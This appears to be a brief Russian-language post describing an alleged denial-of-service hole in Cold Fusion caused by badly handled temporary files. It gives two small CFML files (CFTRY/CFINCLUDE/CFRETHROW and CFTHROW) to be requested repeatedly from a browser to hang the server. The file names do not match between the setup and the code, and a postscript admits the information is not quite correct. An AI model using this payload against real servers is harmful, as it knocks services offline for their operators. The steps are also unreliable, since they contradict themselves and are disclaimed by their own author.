В Cold Fusion есть дырка, если в нее влезть, то
можно подвесить сервер. Дело в неправильно
создаваемых временных файлах, для вызова DoS
атаки нужно сделать следующее: создаем 2
файла file1.cfm и file2.cfm.

Первый:

<CFTRY>
<CFINCLUDE TEMPLATE="test2.cfm">
<CFCATCH>
вызываем encrypted tag или вставляем темплейт
<CFRETHROW>
</CFCATCH>
</CFTRY>

Второй:

<CFTHROW MESSAGE="TEST">

Вызываем несколько раз из броузера test.cfm.

P.S:
По ходу дела, инфа не совсем верная, завтра постараемся все уточнить.

Оставить мнение